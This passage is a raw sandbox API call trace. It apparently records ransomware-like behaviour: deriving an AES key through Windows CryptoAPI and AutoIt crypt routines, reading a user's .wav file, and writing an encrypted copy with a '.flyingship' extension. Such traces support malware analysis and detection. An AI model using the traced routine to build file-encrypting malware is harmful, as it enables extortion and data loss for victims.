wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.010] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.010] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.010] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7dbe0c0, ftCreationTime.dwHighDateTime=0x1d5e7f2, ftLastAccessTime.dwLowDateTime=0xd4fff520, ftLastAccessTime.dwHighDateTime=0x1d5d946, ftLastWriteTime.dwLowDateTime=0xd4fff520, ftLastWriteTime.dwHighDateTime=0x1d5d946, nFileSizeHigh=0x0, nFileSizeLow=0x18c81, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="ObhGwH4nj0Pk.wav", cAlternateFileName="OBHGWH~1.WAV")) returned 0x90af58 [0187.010] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0187.010] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.010] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0187.011] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.011] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.011] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0187.011] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.011] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0187.011] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.011] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.011] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0187.011] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.011] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.011] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.011] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.011] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.011] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0187.011] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.011] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0187.012] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.012] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.012] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0187.012] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.012] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0187.012] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0187.012] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0187.013] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.013] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0187.013] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.013] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0187.013] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.013] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0187.013] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0187.013] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.013] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.013] CryptHashData (hHash=0x90ae18, pbData=0x8dedf8, dwDataLen=0x19, dwFlags=0x1) returned 1 [0187.013] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.013] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0187.013] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.013] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0187.013] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.013] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.013] CryptDestroyHash (hHash=0x90ae18) returned 1 [0187.014] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\obhgwh4nj0pk.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0187.014] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.014] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0187.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0187.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0187.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0187.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0187.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0187.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0187.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0187.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0187.015] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.flyingship.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\obhgwh4nj0pk.flyingship.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0187.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0187.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0187.016] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0187.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0187.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0187.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0187.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0187.016] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0187.037] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0187.037] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0187.041] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x8c81, lpOverlapped=0x0) returned 1 [0187.042] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0187.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0187.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0187.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0187.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0187.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18c81) returned 0xbea018 [0187.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0187.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0187.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0187.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0187.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0187.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0187.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18c81) returned 0xa5f008 [0187.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0187.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0187.045] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0187.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0187.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0187.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0187.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0187.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18c81) returned 0xbea018 [0187.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0187.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0187.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0187.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0187.046] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0187.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0187.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0187.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0187.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0187.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0187.046] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0187.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0187.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0187.047] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0187.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0187.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2698 [0187.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0187.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0187.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0187.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0187.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18c81) returned 0xbea018 [0187.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0187.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0187.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0187.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0187.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2688 [0187.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0187.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0187.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0187.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27c8 [0187.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0187.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0187.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0187.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba120 [0187.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0187.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0187.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0187.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0187.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0187.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18c81) returned 0xa77c98 [0187.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0187.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0187.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0187.048] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0187.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0187.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0187.048] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0187.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0187.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0187.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0187.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0187.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0187.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0187.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0187.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0187.049] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0187.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0187.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0187.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0187.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0187.049] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0187.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0187.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0187.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0187.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0187.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0187.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0187.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0187.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0187.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0187.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0187.049] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0187.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0187.049] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0187.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0187.049] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27d8 [0187.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0187.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0187.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0187.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0187.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9d8 [0187.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0187.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0187.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0187.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0187.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0187.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0187.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0187.050] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0187.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0187.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0187.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0187.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0187.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0187.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0187.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0187.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0187.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0187.050] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0187.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0187.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0187.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0187.050] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0187.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0187.050] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0187.051] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0187.051] RtlAllocateHeap 